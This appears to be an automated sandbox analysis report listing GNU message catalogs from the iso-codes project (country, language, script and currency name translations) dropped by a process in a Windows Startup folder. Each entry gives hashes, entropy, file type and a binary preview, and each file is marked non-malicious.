                                                                                                    MD5:CF63C4F8CB0F84DBC8983DC61622436A
                                                                                                    SHA1:37E2B1241F208A490AE6812B41D9FD9DCD4CF852
                                                                                                    SHA-256:0D8E9DE15EC430FA5011B49BC9FAE637FF32CFA291CDF1FD19CD4D4E4D1C2FD6
                                                                                                    SHA-512:68370AA41352A916FE788013064BEBA07A60377EF48F5D98C0487C397339225024DAB52815E179B07CF612AE0D74B374B774E5BE60A9840068BD5CEE79BE5F45
                                                                                                    Malicious:false
                                                                                                    Preview:........................\........!.......!.......!.......!.......!.......!......."......."......."......."......3"......J"......T"......g"......o"......u".......".......".......".......".......".......".......".......".......".......".......".......".. ....".......#.......#.. ...+#......L#......c#......l#......z#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......($......-$......3$......9$......J$......b$......k$.......$..,....$.......$.......$..%....$.......%.......%.......%......!%......&%....../%......6%......E%..%...T%..,...z%.."....%..*....%.......%.......%.......&.......&......"&......>&......F&......L&......X&......j&......r&......z&.......&.......&..'....&..$....&.......&.......'......2'......Q'......o'......t'......|'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......'.......(.......(......'(.......(......8(......@(......K(......P(......Z(......c(......j(......x(.......(.......(..!....(.......(.......(......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 51 messages, Project-Id-Version: iso_3166-2 'Arouba'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2646
                                                                                                    Entropy (8bit):4.800421463354829
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:PwP4nkpu8AfwjjDBV1p3y2fafQL/UYzuh72S0TsOxs:IPOouCjlVr35Sfs/7S+scs
                                                                                                    MD5:B1D0AD56B7CE3F19F44CC4F73A2F6484
                                                                                                    SHA1:3B76035BA8B027D1D1B0629DDB64A0CF6391425E
                                                                                                    SHA-256:FA548376E93303FC6DF08AAD7F97757EC59763E52B0349AE4C606FA7390966D6
                                                                                                    SHA-512:EDC8C212BD2C65C50DAE5CAD0F1A9F14F5B5F05A37F533FF8547BCD3009C4CCCB8B5E542212ACB1DB0D9A2F21D515BBABF9EBFC8DE9F7CF0B4D8D08FE3DC10D5
                                                                                                    Malicious:false
                                                                                                    Preview:........3...........G...L.......h.......i.......o.......x.......................................................................................................................................".......*.......1.......8.......B.......R.......W......._.......f.......l.......w.......................................................................................................#.......-.......<...$...I.......n.......}...................t...........................%.......=.......D.......K.......X......._.......i.......r............................................................................................................................................................... .......*.......6.......=.......P.......b.......r...............................................................................................-.......C.......N...............................0.......)...........1...................................................,... ...%...+...............................!.......$...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: iso_3166-3 'Teritweres britanikes d' Antartike'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2663
                                                                                                    Entropy (8bit):5.164856879540056
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VAD3OFO2vGqIfdvqNuoU8butc+rfUUivTv/jXTUS:qD+FByBo7aTr8zz7
                                                                                                    MD5:F3F3D348285B0063E8493B347C46094D
                                                                                                    SHA1:0D017A97E9338C0913E8BAB5BBE4951014376C10
                                                                                                    SHA-256:04E3B4A279808AE7332CBC8A90ECB2F0C6AC7ED59E1A1C041270CEDCE12E6F07
                                                                                                    SHA-512:E38C076262B4E909381E332087D1C54AB15BFF817BF6EDAF40BA72D0E02822B0BB719E34A9A084F4C8C81949C98B0F7BB7F4602A69442D8AE053B255FC0E7441
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........v......."... .../...C...0...s...........3...........................................0...*...H...2...s...................................................)...........5.......N.......d.......k...'...}...1...............!...............5...........R........................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 322 messages, Project-Id-Version: iso_639-3 'Abxhaze'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):12889
                                                                                                    Entropy (8bit):4.7167635623553865
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:3VcwqV/Mzl8DQaB5Y7wReXTFMsKrCFSeTJd1:OjEn7byqj
                                                                                                    MD5:01E8E97805A704F40C647EF58E4FB0CF
                                                                                                    SHA1:7A439CBA51468846070361A5AC0F4D2B9C96B674
                                                                                                    SHA-256:44C77249F359CCC7F11ABE56B6CD530F4833393F48EF10B8F553FB566E244B51
                                                                                                    SHA-512:19CFDFA1EA28643B2924EB0321B442D21445A7CEACB69C76FC2D40F9729CC43CD11E9B9C9F7448151E369CD107FC0F77CA39268B761AE0668194E96ABB002DA0
                                                                                                    Malicious:false
                                                                                                    Preview:........B.......,.......<...............................................................(.......2.......7.......@.......I.......O.......W.......^.......h.......p.......w...............................................................................................................................................................................&.......0.......7.......?.......E.......M.......U.......^.......g.......o.......x...............................................................................................................................................................!.......(...............4.......:.......C.......H.......[.......b.......j.......r...............................................................................................................................................................................!.......(...............G.......].......e.......n.......t.......z...............................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 113 messages, Project-Id-Version: iso_3166-1 '\341\212\240\341\210\215\341\211\243\341\212\222\341\213\253'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5713
                                                                                                    Entropy (8bit):5.024295531852221
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:5Ls5igJ1d89pLivavO89kjFbEylUyA3cBwG7YG/wLYpoikXLyCviLz:iFJ1d8DSad0FbEKt7ZfoLz4
                                                                                                    MD5:E1429950D90C7CEB6330A1BA14C66D68
                                                                                                    SHA1:05ABCB1A86CF01AAF10BC52A6BB0A53D88E52669
                                                                                                    SHA-256:60A4D842F988E162DC92FE8C6539CE1A15B0A0C8B6A8278727CE9CD96AFA8DAE
                                                                                                    SHA-512:B7CA4E716604AB5A37B33BA397495B260FB5BB18EDBF279D79A600A72598402B1420396580C591E256A8575FA362009CCB9E347B1136EA82F2555BCA483449A7
                                                                                                    Malicious:false
                                                                                                    Preview:........q...............,.......................................................................................................................................................&.......-.......D.......M.......V......._.......x.......}...............................................................................................................................................".......0.......A.......].......d.......l.......t.......{...............................................................................................................................................................................&.......0.......7.......@.......H.......P.......V.......b.......p.......|...............................................................................................................................................!.......,.......5.......A.......U.......].......d.......y...................................................O...................'.......7.......D.......W.......g.......}.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2 messages, Project-Id-Version: iso_3166-3 '\341\212\224\341\213\230\341\210\255\341\210\213\341\212\225\341\213\265\341\210\265 \341\212\240\341\212\225\341\211\262\341\210\215\341\210\265'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):476
                                                                                                    Entropy (8bit):5.389761207720562
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:iXQ1xjt02UkLKcG/Ki4FLU5pXmBQWihjEl:35t0UPKKzFA5pXm6M
                                                                                                    MD5:C45ABE6CB060F4D614A88181301FF0BF
                                                                                                    SHA1:C94A85281390110ABE24A3A1BA3087DE37F8E920
                                                                                                    SHA-256:FEC980EAE71DCDD605E092A8A18320D1CF0A04300813C5682D5FA23B70CB434E
                                                                                                    SHA-512:1624B419308908C78B28EFB057C85418CA8698D31672E161C62D5A612F6750E40B79FF791C24271E9B88A0181214B823FF38515C3F9152CEA418EEB5DF033B31
                                                                                                    Malicious:false
                                                                                                    Preview:................,.......<.......P.......Q...O...f...%............................Netherlands Antilles.Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2004-08-08 10:00+0100.Last-Translator: Alastair McKinstry <mckinstry@debian.org>.Language-Team: Walamo.Language: wal.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit......... ......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 392 messages, Project-Id-Version: wo 'Afganistaan'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):21638
                                                                                                    Entropy (8bit):4.994392805925852
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:8k2acl9NGYhEqvbYiUxTbj05wsOP4XGCAjtuV08mJFjVgZAZP+8p:8RagvGmvsiifQmsOP4XGCAjfFjVgZA5p
                                                                                                    MD5:E9021E8681A57283F56F9493D777C294
                                                                                                    SHA1:05339FF4B63BD3C19DA0B113DAEE3220B71035B7
                                                                                                    SHA-256:C420274451FE52E6541EA997DE4D1B3820BB12B027B26B891775257CC50BE989
                                                                                                    SHA-512:9DC410FBC27208DC975F8AFAA956A15473083911BDBD92F7D1A2C59878CF8D2095C367CF3FC8C50D5FD70826E54FEDA7C35919678BD420B3DE8E1C31A216D48E
                                                                                                    Malicious:false
                                                                                                    Preview:................\................ ....... ....... ....... ....... ....... ....... .......!.......!.......!......+!......B!......L!......_!......g!......m!......w!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.......!.. ....!.......!......."......."......#"......1"......8"......W"......n".......".......".......".......".......".......".......".......".......".......".......".......".......#.......#......"#......;#..,...W#.......#.......#..%....#.......#.......#.......#.......#.......#.......#.......#..%....$..,...($.."...U$..*...x$.......$.......$.......$.......$.......$.......$.......$.......$.......%.......%...... %......(%......1%......M%..'...[%.......%.......%.......%.......%.......%.......%.......&.......&.......&......+&......;&......W&......]&......o&......v&......~&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......&.......'.......'.......'..!...*'......L'......^'......|'.......'..0....'.......'......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 31 messages, Project-Id-Version: wo 'British Antarctic Territory'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2544
                                                                                                    Entropy (8bit):5.128329251974936
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:VADOatkb9qOvGqIfdvqNu8UVcVwQIgNNrrKUZZ:qDr+BbyB8KYNz/NP
                                                                                                    MD5:A739869FDB650E363DDA69C5D4D359EB
                                                                                                    SHA1:AE2FC086939C2E851BB5CEA4C7F723F24F9D0909
                                                                                                    SHA-256:8E697265098988BD7E714F8B0A89C0FFCFA4ACCE577E468E032A1BFC40FD5FB5
                                                                                                    SHA-512:9C331F2021BE5A4A5E47B9C56E574ECEEEF1DB31ED45BB6872D055C917481F8B434D622EB567AE5B08EBA8BB1FA9DD73E210C1A64AD59823887470CF9887805D
                                                                                                    Malicious:false
                                                                                                    Preview:....................).......................).......*...........".../...?.......o.......w...........................)...........................!.......1.......@.......U.......b...!...o................................... .......)............... ...6.......W...2...c...........n...............(...4...+...]...........-...............................................)....... ...4.......U.......p...................................!....................................... .......,...@.......m...#...............(....................................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern and Antarctic Territori
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 61 messages, Project-Id-Version: iso_3166-1 'Antigua no Barbuda'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2821
                                                                                                    Entropy (8bit):4.623872045152753
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:9wQ90guVYCh+B/Gfr9O+kXkKF5BZNN/plO7KyU2TezOc4NVcwqMOSgq:9wk01+/Or9OPFt6uyTaypcwq/W
                                                                                                    MD5:00883FC676407FD1F58DA33B2BBF7A2E
                                                                                                    SHA1:68032E4B8957C154C6F960D56B9E05DD829F290C
                                                                                                    SHA-256:ACDE178FB8BD8BE067F239262CCCD8ED3CDEE5972E317B3AB28356C08E9EF93B
                                                                                                    SHA-512:F37BE04C577C63C172622692CCB774C259A1A6C4F5D999CB46D1D403A0BD183D8BFE9F038566ED3306DB7523E83375C6AB479871657B7AA516281CFF20F8EEDE
                                                                                                    Malicious:false
                                                                                                    Preview:........=...........S...........8.......9.......M.......W.......a.......i.......t............................................................................................................................................................... .......*.......3.......;.......C.......M.......U.......\.......b.......h.......o.......y...............................................................................................................................................................%.......9.......A.......I...l...S.......................................................................................'...............7.......>.......D.......M.......U..."...]...............................................................................................................................................................#.......).......0.......<.......Z.......a.......h.......q.......v.......}.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 1 message, Project-Id-Version: iso_3166-3
                                                                                                    Category:dropped
                                                                                                    Size (bytes):422
                                                                                                    Entropy (8bit):5.172809123419564
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:ilijcl6YYxA9Ct0vOuvP0NXzffs5k/RyAbwl8Aj8uK72AF6uK7BNnvXmBQ8KMW0W:i4cExxjt02UkB/NklRhef2vXmBQWi9
                                                                                                    MD5:23DC3D324E39DE2B7BB5C42574CFBB4A
                                                                                                    SHA1:5B5802858729684D0202203040C83DA5EC15C588
                                                                                                    SHA-256:250DC6F8972FBF60E558F9D5287A955D068109B166D41F3E404031BD648E6B27
                                                                                                    SHA-512:84CA6D809D18F96FB6EC0471717559DEB416523767E7CCF8CFEB01E2CE78DF1F8DDDB3CFE073B67F3A00B02333404CF1527748DC0B2C1B7D823ECEAFC53C1272
                                                                                                    Malicious:false
                                                                                                    Preview:................$.......,.......8...l...9................Project-Id-Version: iso_3166-3.Report-Msgid-Bugs-To: https://salsa.debian.org/iso-codes-team/iso-codes/issues.PO-Revision-Date: 2002-01-05 18:40+0000.Last-Translator: Antoinette Dekeni <antoinette@translate.org.za>.Language-Team: Xhosa <xhosa@translate.org.za>.Language: xh.MIME-Version: 1.0.Content-Type: text/plain; charset=UTF-8.Content-Transfer-Encoding: 8bit..
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 53 messages, Project-Id-Version: iso_639-3 'isiBhulu'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2528
                                                                                                    Entropy (8bit):4.6010753065567265
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:mbNSFjSKKE4MXpsXhziMUrTeU9seReoEYvz+Z:mbsSRjWmhiMoaMseReoE+u
                                                                                                    MD5:64329D4CC0DA05CC5CCA4833B8CD1BF8
                                                                                                    SHA1:029BD8C7B8D788964636EA5E77F61D6B8C3DACDF
                                                                                                    SHA-256:6FB7F581E5BFE682179D370975DE44CD41EE699FA80B5C746AA07A338CDCFB4E
                                                                                                    SHA-512:2B01C7B66278E1A740D9E69800C73290B5611F21C7CC7C5ED8CC49B9013CEF53C123B4FDF3DDBCD3E0460D54DCFE621B0CB4691CAA7AA6CB79B0ECFD020881AB
                                                                                                    Malicious:false
                                                                                                    Preview:........5...........G...l.......................................................................................................................................................................$...............9.......?.......G.......P.......W......._.......g.......r.......}...............................................................................................................................................................................#.......(...............................................................................................(.......2.......@.......M.......X.......d.......n.......y.......................................................................................................................#.......+.......6.......A.......K.......X.......b.......k.......v.......................................................................................1...(...*...........2.................../...3...&...........%...............!..."...........'...............5...........
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 219 messages, Project-Id-Version: iso_3166-1 'Afghan\303\255st\303\240n'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11032
                                                                                                    Entropy (8bit):5.149347423449318
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:eAd+Bstlk7ahn2zt3bBwTJBzugoJu0ZNmd2NvrYTASRt:lkstlIahna5bBw19ugoJu0ZAEYcy
                                                                                                    MD5:29DE8CAE7A81906FB2AE54A0314E79E0
                                                                                                    SHA1:AFDA9CC4156B3774485618BC2D483CD6A811FF3E
                                                                                                    SHA-256:BD725402E2DA0965EFC5B98B7DDCED349996EC011F082A1393A06302E22219DA
                                                                                                    SHA-512:4B5DDCDE67B62223663D67E9DD37A558DAA1A1DEB4230CD8C17F3067062AA00E9FDA150CC18A14109440A9F4D196B2989412FAA43E89032E93DC79B197F9E420
                                                                                                    Malicious:false
                                                                                                    Preview:....................%...........`.......a.......m.......u.......}....................................................................................................................................... .......&...............5.......=.......T.......].......k.......r.......................................................................................................*.......3.......;.......H.......S.......[.......`.......i.......p.......................................................................................................................#.......*.......8.......I.......O.......W......._.......e.......o.......v...........................................................................!...........................................................".......'......./.......;.......B.......H.......P.......V.......].......d.......o.......u.......~...............................................................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 126 messages, Project-Id-Version: iso_15924 '\351\230\277\345\276\267\346\213\211\345\247\206\350\257\255'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7170
                                                                                                    Entropy (8bit):5.685621651090454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:jQLIqjAZIdKIlvM90bYLtDmnONfYUDy47us7eKRRo+lMWi6/k4E1AcmIBOtjm4Fv:kL4Ghlva0Q+4KqFS2jE1ARIBOtjm4d
                                                                                                    MD5:C1A5E64BBFC3AB0A820F28F9CFEBD170
                                                                                                    SHA1:BF7A3BEB279760059A509C7E89D34DD3EB16CED7
                                                                                                    SHA-256:EF779D08B54EC22BE7256C5B45CAAB4F4075B2E0B0A580E6250C3EE444AE6496
                                                                                                    SHA-512:55F99C2F12E5AA0E855AD0D3F08BF45B6100FC8BDAE0F9E928A3AAC4BAFC0F8F8BD43DC95619094ABBA5CD08EE494BD447AED28C84C89E1F074B5926867C1996
                                                                                                    Malicious:false
                                                                                                    Preview:........~...................................................?...........................-.......6.......>.......G.......M.......W.......].......e.......o.......{...............................................................................................................).......0.......8...&...A.......h.......y...(...................................................................(......./.......7.......=.......F.......O.......i...........,.................................................................../...4...^...................................................................#...................................$.......*.......3.......<.......J.......Q.......X.......b.......t...........................................(...............-...........H.......O.......U..."...u........................................................................... ...........7.......B.......H.......R.......Y.......a.......k.......x.......................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\351\230\277\345\257\214\346\261\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23425
                                                                                                    Entropy (8bit):5.661922317837652
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosV5Ny46nbjz5wsWP48WAINiZGr5GLokLM+:0oiy48fmsWP48WAIVsXt
                                                                                                    MD5:1A8279EF47AEAFCEAA1E6FC05DC3E04E
                                                                                                    SHA1:9DB5829E8E3ACDD1DA81D7A24D4E3495886932B4
                                                                                                    SHA-256:705BE6DAD84BF15AD438183FC2045208DA44F249795B9D2815653FDA8B8BF1A5
                                                                                                    SHA-512:640ADB7F86B18BF3606E0FDBAD0DB67C78B41F31195DB9A20B11EB57FA386A236636F8B9C38B268D984B1F7508BC7DD1974A60777906D91D9E4B13AE86218603
                                                                                                    Malicious:false
                                                                                                    Preview:................l...9............#.......#.......#.......#.......#.......#.......#.......#.......#.......#.......$.......$......$$......7$......?$......E$......O$......W$......b$......j$......r$......}$.......$.......$.......$.......$.......$.......$.. ....$.......$.......$.. ....$.......%......3%......<%......J%......Q%......p%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......%.......&.......&.......&.......&......%&......=&......F&......_&..,...{&.......&.......&..%....&.......&.......&.......&.......&.......'.......'.......'...... '......('..%...7'..,...]'.."....'..*....'.......'.......'.......'.......'.......(......!(......)(....../(......;(......M(......U(......](......f(......o(.......(..'....(..$....(.......(.......).......)......:)......Y)......w)......|).......).......).......).......).......).......).......).......).......).......).......*.......*.......*....../*......6*......@*......H*......S*......X*......b*......k*......r*.......*.......*......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 2609 messages, Project-Id-Version: iso_3166-2 '\345\237\203\347\223\246\345\262\233'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):116542
                                                                                                    Entropy (8bit):5.68384531677302
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:Ul6DFALHWIuHoe5p1OEJpE2IAYb9i0vHdojTUB7kz:Ul65ALLuIe9dG9JvKjoBAz
                                                                                                    MD5:B03642F0F2FA1DBEEC606E16BEC80B01
                                                                                                    SHA1:EEC23F8EF67EBEA96266DD41174BC8740E6FAD2C
                                                                                                    SHA-256:E465CC5648EF218A4B4450970FAC9EEE7C8ABEA8A776CFB8381E6DF853847D29
                                                                                                    SHA-512:EFD12AA88823814B57B95D7B84B44389E3DAE972167A94B2BC0E37481666890F01E9FED5E849178316A8DB7D96D14480E8AF8A1E1E4385245F959C16D393440D
                                                                                                    Malicious:false
                                                                                                    Preview:........1........Q......,.......................................................................................................................!.......*.......2.......8.......A.......K.......R.......b.......l.......{...............................................................................................................................................................*.......3.......?.......T.......c.......m.......v....................................................................................................................................................... .......'...............7.......G......._.......l.......z.......................................................................................................................(......./.......5.......A.......H.......O.......W.......d.......n.......v...............................................................................................................................................'.......0.......9.......B.......
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 32 messages, Project-Id-Version: iso_3166-3 '\350\213\261\345\261\236\345\215\227\346\236\201\346\264\262\351\242\206\345\234\260'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2696
                                                                                                    Entropy (8bit):5.944815216832334
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rLf3g/j+vGqIfdvqN5CoUIqW96G0jRCWlnaHr3+x4z5QLkTRZ:rLvgr+yaCo6W96tjRCWlf4zGQTRZ
                                                                                                    MD5:2EBDE00B6409A0EF157A52DDD85B328B
                                                                                                    SHA1:C9F3719429693D332DDCFB8BD5C2ED3DF9AEF4EF
                                                                                                    SHA-256:8C60C5B4A31F66A1157A98656034F211EB3CC71A4A9A72811C33560227E84FFB
                                                                                                    SHA-512:BFD1F67AE2D7F03993D3EBA6B8EEB984F2E09E47E34D0AA14ED669C37B2CEA92D6A6C25FA5681DE8940171DD871F323FCA381030A46E8532C8C988E4AAA9028A
                                                                                                    Malicious:false
                                                                                                    Preview:........ ...........+.......................).......*...........:.../...W...........................................)...........................9.......I.......X.......m.......z...!....................................... .......)...........5... ...N.......o...2...{...+...............................!.......*...........,...'...E.......m.......w...............................................................$...............D.......N.......d...........................................$...........................'.......1...'...M.......u........... ....................................................................................................................................................................British Antarctic Territory.Burma, Socialist Republic of the Union of.Byelorussian SSR Soviet Socialist Republic.Canton and Enderbury Islands.Czechoslovakia, Czechoslovak Socialist Republic.Dahomey.Dronning Maud Land.East Timor.France, Metropolitan.French Afars and Issas.French Southern
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 180 messages, Project-Id-Version: iso_4217 '\351\235\236\346\264\262\345\274\200\345\217\221\351\223\266\350\241\214\350\256\260\345\270\220\345\215\225\344\275\215'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9620
                                                                                                    Entropy (8bit):5.6201600800181515
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:fqFc00khg6VRyK0G/2LCntxaqEXum9RJnJ7s9Bu:Sok66TL0G/Uo/aqPm9RJJ7n
                                                                                                    MD5:8E8C5690F386248D74DC9F8CB5AA2DE8
                                                                                                    SHA1:7209C8E6B44512BC813303233C6B77DBFE594421
                                                                                                    SHA-256:2B53552281691AC8022D60720D59FD4E1A12EBC9B2F5BBBED0189C3D2C1E8A82
                                                                                                    SHA-512:3D45F967186AF67BAA0A75764B4FF5CE9F6678B4C9A8283EF51492E220B4AB5F6CE2C81C67DFA8FA5BF350643370D320CFA9949C7BB2E4B037F78C879461E7C0
                                                                                                    Malicious:false
                                                                                                    Preview:........................\....... .......!.......5.......=.......L.......[.......i.......w...........................................................................................1...!...3...S...9.......7...................................$.......2.......B.......Q.......[.......m.......}...........0...................................................................9.......F.......M.......Z.......`.......o.......u...............................................................................................................%.......-.......;.......I.......Z.......b.......p.......}.......................................................................................................................................(.......5.......?.......D.......T.......b.......t...........!...................................................................................1.......D.......V.......i.......r.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 309 messages, Project-Id-Version: iso_639-3 '\351\230\277\345\270\203\345\223\210\345\205\271\350\257\255'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14527
                                                                                                    Entropy (8bit):5.434937975805054
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:x9T/i248S2WFC7N/EjFMrt1NBVPzHGrOnI9SL0O3W:3/ZRLD9E5mHGSnI963W
                                                                                                    MD5:C31A05140A7B9E5F3F4DAEA192283074
                                                                                                    SHA1:7B437FD8362456489493076F60B3D8182A9DF6B0
                                                                                                    SHA-256:4FF2D8D7C40A1134F6EF12E2F4E859132322834F8C89A61AD15E925E81E39429
                                                                                                    SHA-512:9F803CD9D52B58835B6DBABF86B52DC3CC4667DC10FD1EE2924F22824FFF903F83D6CD237A4F548FFF5A6F0918CF144CB9F92EB57B7DE8DF402A77D0EC404F78
                                                                                                    Malicious:false
                                                                                                    Preview:........5...............l...............................................................(.......2.......7.......@.......F.......N.......U.......].......d.......m.......v.......~...............................................................................................................................!.......&.......-.......7.......?.......E.......M.......U.......^.......e.......n.......w...............................................................................................,.......?.......L.......].......i.......x.......................................................................................................................................".......(.......1.......3.......8.......K.......R.......Z.......b.......~............................................................................................................... .......#.......)...............7...#...>.......b.......................................................................................................
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 91 messages, Project-Id-Version: iso_15924 '\351\230\277\345\276\267\346\213\211\345\247\206\346\226\207\345\255\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4992
                                                                                                    Entropy (8bit):5.578022047213081
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:ldGh+82Kaj+8lsJbPNNiopje/R5lpT6ONYYeEydXlyOz9w:l2UKaZsBBjmN+YDy/j9w
                                                                                                    MD5:53E363D1E6447A11F497CEC678BA2BDE
                                                                                                    SHA1:9DA8B6F253D52679890A9D35E4025F8930DCC694
                                                                                                    SHA-256:4B0B3638CAC11692E80EAD14D36979903CA3A6B35569295B834AFE229E2141E6
                                                                                                    SHA-512:25D29364C13CC36E863536DA8B04F330C073DFBBE67D8909FE919B123DDCC6617E2D80739916CDD42F1C232422EC8DE9834AAA3FBB3180268580E99DF369FF4D
                                                                                                    Malicious:false
                                                                                                    Preview:........[.......................................................................................................".......+.......2.......:.......C.......I.......P.......U.......^.......d.......k.......s...&...|...................(...................................).......;.......P.......[.......b.......h.......q.......z.......................................................................................................................1.......H.......W.......].......f.......o.......y...............................................................................................................%.......0.......;.......A.......H.......W......._.......i.......q.......x...................................................................%...............................................'...........%.......5.......B.......R......._.......o.......|...................................................................................3...........E.......^.......t...........................$.......!...
                                                                                                    Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scr
                                                                                                    File Type:GNU message catalog (little endian), revision 0.0, 426 messages, Project-Id-Version: iso_3166-1 '\351\230\277\345\257\214\346\261\227'
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23388
                                                                                                    Entropy (8bit):5.669045544010439
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:F9k3DKSosB6odw6kx46nbjz5wsWP48WAINiZG3VsquQdGCrF1NLdP:0oa64S48fmsWP48WAIXztMgDF
                                                                                                    MD5:D8FA6C2039072AED78E11AAF93223A0A
                                                                                                    SHA1:F142FDE2A3FCC9F9F6AF65EA93DDBFD065467121
                                                                                                    SHA-256:D38B4EA68B55403496B2220BD6BF763DD7B931B94D110707467B5DC6182F5BB2
                                                                                                    SHA-512:263CF029A62EA519CC8B6161900E211EEE1F044A6ACE9A06D8C7B81330839CEF9C9E64BDBD0782E09198FA8A89B364BE96F4BA23A421065E2DC462668F7D9D72
                                                                                                    Malicious:false
